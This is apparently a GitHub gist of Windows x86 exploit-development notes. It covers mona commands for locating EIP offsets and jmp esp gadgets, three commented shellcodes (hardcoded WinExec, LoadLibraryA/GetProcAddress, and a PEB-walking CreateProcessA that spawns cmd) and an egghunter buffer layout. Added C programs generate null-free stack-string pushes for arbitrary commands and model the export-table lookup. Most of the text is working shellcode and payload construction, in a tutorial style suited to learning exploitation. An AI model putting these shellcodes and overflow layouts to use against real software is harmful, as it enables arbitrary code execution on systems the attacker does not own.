@adon90 adon90/exploiting.txt
Last active Aug 1, 2018

Exploiting Tricks
Mona tricks:
---------------
!mona pc 1000 -> generate a 1000-byte cyclic pattern (pattern_create); send it as the payload and crash the target with it
!mona findmsp -> after the crash, locate the pattern in the registers and in memory: the offset of the EIP overwrite, where ESP points into the pattern and how many pattern bytes follow it, etc.
No jmp esp in an executable region (.text) but DEP is off: get the opcode bytes and search the whole module, not just .text. Without DEP a jmp esp that sits in a data section still executes.
!mona asm -s "jmp esp" -> \xff\xe4
!mona find -s "\xff\xe4" -m <module>
-----------------
SHELLCODES
1. WinExec hardcoded
arwin kernel32 WinExec -> prints the address of WinExec in kernel32 on the machine you run it on. It is only valid for the target if the target runs the same kernel32 build without ASLR.
--------------------------
shellcode = ("\x33\xc0"              # xor eax,eax
"\x50"                               # push eax             ; NUL terminator
"\x68\x2E\x65\x78\x65"               # push ".exe"
"\x68\x63\x61\x6C\x63"               # push "calc"          ; esp -> "calc.exe\0"
"\x8B\xC4"                           # mov eax,esp
"\x6A\x01"                           # push 1               ; uCmdShow = SW_SHOWNORMAL
"\x50"                               # push eax             ; lpCmdLine
"\xBB\xED\x2A\x86\x7C"               # mov ebx,0x7c862aed   ; WinExec address extracted with arwin (valid only for that kernel32 build)
"\xFF\xD3")                          # call ebx
-------------------------------------
http://www.fuzzysecurity.com/tutorials/expDev/6.html
https://github.com/73696e65/windows-exploits/blob/master/arwin.exe
2. GetProcAddress + LoadLibraryA (GetProcAddress(LoadLibraryA("kernel32.dll"), "WinExec"))
Find the pointers to GetProcAddress and LoadLibraryA in .rdata (the import table), starting from the module's EntryPoint:
Search For > Name in all Modules
Take the address of the pointer (Follow in Dump) and use that address as the operand.
ff 15 imm32 is call dword ptr [imm32]: the operand is the address of the slot that holds the function pointer, not the function itself, so it has to be the slot you just found, and it is only valid for that binary and that kernel32 build.
------------------------------------------------
shellcode = "\x31\xC9"                   # xor ecx,ecx
shellcode += "\x51"                      # push ecx                    ; NUL terminator
shellcode += "\x68\x2e\x64\x6c\x6c"      # push ".dll"
shellcode += "\x68\x65\x6c\x33\x32"      # push "el32"
shellcode += "\x68\x6b\x65\x72\x6e"      # push "kern"                 ; esp -> "kernel32.dll\0"
shellcode += "\x54"                      # push esp                    ; lpLibFileName
shellcode += "\xff\x15\x7b\x1d\x80\x7c"  # call dword ptr [0x7c801d7b] ; *LoadLibraryA (pointer slot found as above; target-specific)
shellcode += "\xb9\x21\x78\x65\x63"      # mov ecx, 0x63657821         ; "!xec": filler byte in the low byte, so no \x00 in the immediate
shellcode += "\xc1\xe9\x08"              # shr ecx, 8                  ; ecx = 0x00636578 = "xec\0"
shellcode += "\x51"                      # push ecx                    ; GetProcAddress compares the whole name, so it must be NUL-terminated
shellcode += "\x68\x57\x69\x6e\x45"      # push "WinE"                 ; esp -> "WinExec\0"
shellcode += "\x54"                      # push esp                    ; lpProcName
shellcode += "\x50"                      # push eax                    ; hModule = LoadLibraryA's return value (kernel32)
shellcode += "\xff\x15\x40\xae\x80\x7c"  # call dword ptr [0x7c80ae40] ; *GetProcAddress (pointer slot; target-specific)
shellcode += "\x31\xC9"                  # xor ecx,ecx
shellcode += "\x51"                      # push ecx                    ; NUL terminator
shellcode += "\x68\x2e\x65\x78\x65"      # push ".exe"
shellcode += "\x68\x63\x61\x6c\x63"      # push "calc"                 ; esp -> "calc.exe\0"
shellcode += "\x89\xe2"                  # mov edx, esp
shellcode += "\x6a\x01"                  # push 1                      ; uCmdShow = SW_SHOWNORMAL
shellcode += "\x52"                      # push edx                    ; lpCmdLine
shellcode += "\xff\xd0"                  # call eax                    ; eax = GetProcAddress's return value (WinExec)
------------------------------------------------------
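Added example (mine, not code from the gist): a generator for the "push the string onto the stack" prologue that shellcodes 1 and 2 both use, for any ASCII command line, plus a tiny interpreter that replays the emitted bytes on a fake stack so the result can be checked off-Windows. It also handles the case the page's "WinExec" string runs into, a length that is not a multiple of 4, with a mov/shr pair so the code stays free of null bytes. Assumptions: 32-bit x86, ECX is free as a scratch register, and the '!' filler byte is arbitrary.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* x86 immediates and stack dwords are little-endian whatever the host is. */
static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Emit 32-bit x86 code that leaves ESP pointing at a NUL-terminated copy of s,
 * one dword per push, last chunk first. Returns bytes written, 0 on error. */
size_t emit_push_string(const char *s, uint8_t *out, size_t cap)
{
    size_t len = strlen(s), tail = len % 4, full = len - tail, pos = 0;
    if (len == 0 || cap < 2 * len + 16) return 0;
    out[pos++] = 0x31; out[pos++] = 0xc9;                 /* xor ecx,ecx */
    out[pos++] = 0x51;                                    /* push ecx   ; the terminator */
    if (tail) {
        /* mov ecx,imm32 with the 1..3 real chars in the high bytes and '!' filler in the
         * low bytes, then shr ecx,8*(4-tail) turns the filler into the zero bytes. */
        uint32_t imm = 0;
        for (size_t i = 0; i < 4; i++) {
            uint8_t c = (i < 4 - tail) ? '!' : (uint8_t)s[full + i - (4 - tail)];
            imm |= (uint32_t)c << (8 * i);
        }
        out[pos++] = 0xb9; wr32(out + pos, imm); pos += 4;                       /* mov ecx, imm32 */
        out[pos++] = 0xc1; out[pos++] = 0xe9; out[pos++] = (uint8_t)(8 * (4 - tail)); /* shr ecx, n */
        out[pos++] = 0x51;                                                        /* push ecx */
    }
    for (size_t k = full; k >= 4; k -= 4) {               /* push imm32, last dword first */
        out[pos++] = 0x68; memcpy(out + pos, s + k - 4, 4); pos += 4;
    }
    return pos;
}

/* True if the code contains a 0x00 byte (fatal for a strcpy-style overflow). */
int has_null(const uint8_t *code, size_t n)
{
    for (size_t i = 0; i < n; i++) if (code[i] == 0) return 1;
    return 0;
}

/* Interpreter for the five instruction forms emit_push_string() uses, run on a
 * fake stack. Writes the string ESP would point at into out; 0 on unknown opcode. */
int simulate_push_string(const uint8_t *code, size_t n, char *out, size_t out_cap)
{
    uint8_t stack[256];
    uint32_t ecx = 0xdeadbeef;           /* deliberately dirty: the code must zero it itself */
    size_t sp = sizeof stack, ip = 0;
    while (ip < n) {
        int do_push = 0; uint32_t v = 0;
        if (ip + 1 < n && code[ip] == 0x31 && code[ip + 1] == 0xc9) { ecx = 0; ip += 2; }
        else if (code[ip] == 0x51) { v = ecx; do_push = 1; ip += 1; }
        else if (ip + 4 < n && code[ip] == 0x68) { v = rd32(code + ip + 1); do_push = 1; ip += 5; }
        else if (ip + 4 < n && code[ip] == 0xb9) { ecx = rd32(code + ip + 1); ip += 5; }
        else if (ip + 2 < n && code[ip] == 0xc1 && code[ip + 1] == 0xe9) { ecx >>= code[ip + 2]; ip += 3; }
        else return 0;
        if (do_push) { if (sp < 4) return 0; sp -= 4; wr32(stack + sp, v); }
    }
    if (sizeof stack - sp > out_cap) return 0;
    memcpy(out, stack + sp, sizeof stack - sp);          /* includes the pushed terminator */
    return 1;
}

/* Emit, check for nulls, replay, compare: the whole pipeline for one string. */
int roundtrip_ok(const char *s)
{
    uint8_t code[128]; char back[128];
    size_t n = emit_push_string(s, code, sizeof code);
    return n > 0 && !has_null(code, n) && simulate_push_string(code, n, back, sizeof back)
           && strcmp(back, s) == 0;
}

/* Compare the generated code with expected bytes (e.g. the gist's own calc.exe sequence). */
int emit_matches(const char *s, const uint8_t *expect, size_t n)
{
    uint8_t code[128];
    return emit_push_string(s, code, sizeof code) == n && memcmp(code, expect, n) == 0;
}

int main(void)
{
    const char *samples[] = { "calc.exe", "WinExec", "kernel32.dll", "cmd.exe /c whoami" };  /* constructed inputs */
    for (size_t i = 0; i < 4; i++) {
        uint8_t code[128];
        size_t n = emit_push_string(samples[i], code, sizeof code);
        printf("%-18s %2zu bytes, roundtrip %s:", samples[i], n, roundtrip_ok(samples[i]) ? "ok" : "FAIL");
        for (size_t j = 0; j < n; j++) printf(" %02x", code[j]);
        printf("\n");
    }
    return 0;
}
```

For "calc.exe" and "kernel32.dll" the output is byte-for-byte the push sequences used in shellcodes 1 and 2; for "WinExec" it is the mov/shr form, because a bare `push "xec "` would leave the name unterminated and GetProcAddress would not find it.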
3. API resolved from the PEB (no hardcoded addresses). This one walks the PEB to kernel32, searches its export table and calls CreateProcessA; it is the shellcode from the packetstorm link below, and the govolution link is the WinExec-based equivalent.
----------------------------------------------------------
shellcode =("\x31\xdb\x64\x8b\x7b\x30"                      # xor ebx,ebx ; mov edi,fs:[ebx+0x30]                     (PEB)
"\x8b\x7f\x0c\x8b\x7f\x1c"                                  # mov edi,[edi+0xc] ; mov edi,[edi+0x1c]                 (Ldr -> InInitializationOrderModuleList)
"\x8b\x47\x08\x8b\x77\x20\x8b\x3f"                          # mov eax,[edi+8] (DllBase) ; mov esi,[edi+0x20] (BaseDllName) ; mov edi,[edi] (next)
"\x80\x7e\x0c\x33\x75\xf2"                                  # cmp byte [esi+0xc],'3' ; jne loop                      (7th UTF-16 char of "kernel32.dll")
"\x89\xc7\x03\x78\x3c"                                      # mov edi,eax ; add edi,[eax+0x3c]                       (e_lfanew -> PE header)
"\x8b\x57\x78\x01\xc2"                                      # mov edx,[edi+0x78] ; add edx,eax                       (export directory)
"\x8b\x7a\x20\x01\xc7\x89\xdd"                              # mov edi,[edx+0x20] ; add edi,eax (AddressOfNames) ; mov ebp,ebx (i = 0)
"\x8b\x34\xaf\x01\xc6\x45"                                  # mov esi,[edi+ebp*4] ; add esi,eax ; inc ebp            (name i, index already moved on)
"\x81\x3e\x43\x72\x65\x61\x75\xf2"                          # cmp dword [esi],"Crea" ; jne loop
"\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9"                      # cmp dword [esi+8],"oces" ; jne loop                    ("CreateProcessA")
"\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f"                      # mov edi,[edx+0x24] ; add edi,eax ; mov bp,[edi+ebp*2]  (AddressOfNameOrdinals; reads the entry after the match, so it relies on kernel32's ordinals being sequential)
"\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7"              # mov edi,[edx+0x1c] ; add edi,eax ; mov edi,[edi+ebp*4-4] ; add edi,eax  (AddressOfFunctions -> edi = CreateProcessA)
"\x89\xd9\xb1\xff\x53\xe2\xfd"                              # mov ecx,ebx ; mov cl,0xff ; push ebx ; loop            (255 zero dwords: STARTUPINFO and PROCESS_INFORMATION)
"\x68\x63\x6d\x64\x20"                                      # push "cmd "   payload: lpCommandLine
"\x89\xe2\x52\x52\x53\x53"                                  # mov edx,esp ; push edx x2 (lpProcessInformation, lpStartupInfo) ; push ebx x2
"\x53\x53\x53\x53\x52\x53\xff\xd7")                         # push ebx x4 ; push edx (lpCommandLine) ; push ebx (lpApplicationName) ; call edi
---------------------------------------------------------
https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
https://govolution.wordpress.com/2015/02/07/one-for-all-null-free-windows-winexec-shellcode-tool-for-generating-payload/
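Added example (mine, not the gist's or the packetstorm author's code): the export-table walk from shellcode 3 modelled in C over a constructed in-memory PE32 image, so it runs anywhere. The names, ordinals and RVAs are made up. It resolves CreateProcessA the documented way (name index -> AddressOfNameOrdinals -> AddressOfFunctions) and the way the bytes above do it as I decode them (inc ebp runs before the compares, so the code reads AddressOfNameOrdinals[i+1] and then AddressOfFunctions[that-1]); the two agree only while the ordinal table is sequential, which is what the shellcode relies on in kernel32. The 8-byte "Crea"/"oces" test also matches CreateProcessW, so whichever comes first in name order wins.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* PE fields are little-endian whatever the host is, so read and write them byte-wise. */
static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* Layout of the constructed image; offsets double as RVAs since it is "mapped" at img. */
#define IMG_SIZE 0x1000
enum { PE_OFF = 0x80, EXP_OFF = 0x200, FUNCS_OFF = 0x300, NAMES_OFF = 0x340, ORDS_OFF = 0x380, STR_OFF = 0x400 };

/* Build only the parts of a PE32 image the export walk touches: e_lfanew, the export
 * directory RVA at PE+0x78, and the three export tables. names[] is in AddressOfNames
 * order, ords[i] is the unbiased ordinal of names[i], funcs[k] is AddressOfFunctions[k]. */
void build_image(uint8_t *img, const char *const *names, const uint16_t *ords, const uint32_t *funcs, size_t n)
{
    uint32_t str = STR_OFF;
    memset(img, 0, IMG_SIZE);
    wr32(img + 0x3c, PE_OFF);                 /* IMAGE_DOS_HEADER.e_lfanew */
    memcpy(img + PE_OFF, "PE\0\0", 4);
    wr32(img + PE_OFF + 0x78, EXP_OFF);       /* DataDirectory[0] (export).VirtualAddress */
    wr32(img + EXP_OFF + 0x14, (uint32_t)n);  /* NumberOfFunctions */
    wr32(img + EXP_OFF + 0x18, (uint32_t)n);  /* NumberOfNames */
    wr32(img + EXP_OFF + 0x1c, FUNCS_OFF);    /* AddressOfFunctions */
    wr32(img + EXP_OFF + 0x20, NAMES_OFF);    /* AddressOfNames */
    wr32(img + EXP_OFF + 0x24, ORDS_OFF);     /* AddressOfNameOrdinals */
    for (size_t i = 0; i < n; i++) {
        wr32(img + FUNCS_OFF + 4 * i, funcs[i]);
        wr16(img + ORDS_OFF + 2 * i, ords[i]);
        wr32(img + NAMES_OFF + 4 * i, str);
        strcpy((char *)img + str, names[i]);
        str += (uint32_t)strlen(names[i]) + 1;
    }
}

/* The documented lookup: name index i -> AddressOfNameOrdinals[i] -> AddressOfFunctions[ord]. */
uint32_t resolve_export(const uint8_t *img, const char *name)
{
    const uint8_t *exp = img + rd32(img + rd32(img + 0x3c) + 0x78);
    uint32_t n = rd32(exp + 0x18), funcs = rd32(exp + 0x1c), names = rd32(exp + 0x20), ords = rd32(exp + 0x24);
    for (uint32_t i = 0; i < n; i++)
        if (strcmp((const char *)img + rd32(img + names + 4 * i), name) == 0)
            return rd32(img + funcs + 4 * rd16(img + ords + 2 * i));
    return 0;
}

/* The lookup as shellcode 3's bytes perform it: 8-byte prefix test on the name, index
 * incremented before the compares, then ordinals[i+1] and functions[that-1]. */
uint32_t resolve_like_shellcode3(const uint8_t *img)
{
    const uint8_t *exp = img + rd32(img + rd32(img + 0x3c) + 0x78);
    uint32_t n = rd32(exp + 0x18), funcs = rd32(exp + 0x1c), names = rd32(exp + 0x20), ords = rd32(exp + 0x24);
    uint32_t ebp = 0;
    uint16_t bp;
    for (;;) {
        const char *s;
        if (ebp >= n) return 0;                       /* the real code has no bound; added so the model cannot run off the table */
        s = (const char *)img + rd32(img + names + 4 * ebp);
        ebp++;                                        /* inc ebp */
        if (memcmp(s, "Crea", 4) == 0 && memcmp(s + 8, "oces", 4) == 0) break;
    }
    bp = rd16(img + ords + 2 * ebp);                  /* mov bp, [ordinals + ebp*2] */
    if (bp == 0) return 0;                            /* [functions + ebp*4 - 4] would read before the table */
    return rd32(img + funcs + 4 * (bp - 1));          /* mov edi, [functions + ebp*4 - 4] */
}

/* Constructed tables: kernel32-style alphabetical names, once with ordinals[i] == i
 * as kernel32 has them, once with an arbitrary ordinal order. */
static const char *const k_names[] = { "CloseHandle", "CreateFileA", "CreateProcessA", "CreateProcessW", "WinExec" };
static const uint32_t k_funcs[] = { 0x1100, 0x2200, 0x3300, 0x4400, 0x5500 };
static const uint16_t k_ords_seq[] = { 0, 1, 2, 3, 4 };
static const uint16_t k_ords_mixed[] = { 1, 4, 3, 2, 0 };

uint32_t lookup(int mixed, const char *name)
{
    uint8_t img[IMG_SIZE];
    build_image(img, k_names, mixed ? k_ords_mixed : k_ords_seq, k_funcs, 5);
    return resolve_export(img, name);
}

uint32_t walk_like_shellcode3(int mixed)
{
    uint8_t img[IMG_SIZE];
    build_image(img, k_names, mixed ? k_ords_mixed : k_ords_seq, k_funcs, 5);
    return resolve_like_shellcode3(img);
}

int main(void)
{
    for (int mixed = 0; mixed < 2; mixed++)
        printf("%s ordinals: CreateProcessA = %#x by the book, %#x the shellcode's way\n",
               mixed ? "mixed" : "sequential", lookup(mixed, "CreateProcessA"), walk_like_shellcode3(mixed));
    return 0;
}
```

On the sequential table both walks return the same RVA; on the mixed one the shellcode-style walk returns a different function, which is the check to run before pointing this resolver at a DLL other than kernel32.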
Egghunter
------------
evil = "A" * (510-len(hunter)-50) + nops + hunter + "\x90" * 5 + jmp_esp + "\xE9\xC0\xFF\xFF\xFF"
Layout: padding, a NOP slide (nops), the hunter, 5 NOPs, the saved return address (jmp_esp), and then the 5 bytes ESP points at after the ret: "\xE9\xC0\xFF\xFF\xFF" is jmp rel32 with rel32 = -0x40, counted from the end of the instruction, so it jumps 59 bytes back from its own start: over the return address, the 5 NOPs and the hunter, into the NOP slide in front of the hunter (50 - len(hunter) bytes before it, 18 for the usual 32-byte hunter; a hunter of 50 bytes or more would be landed in). Execution then slides forward into the hunter.
Important to put NOPS between the hunter and the JMP ESP.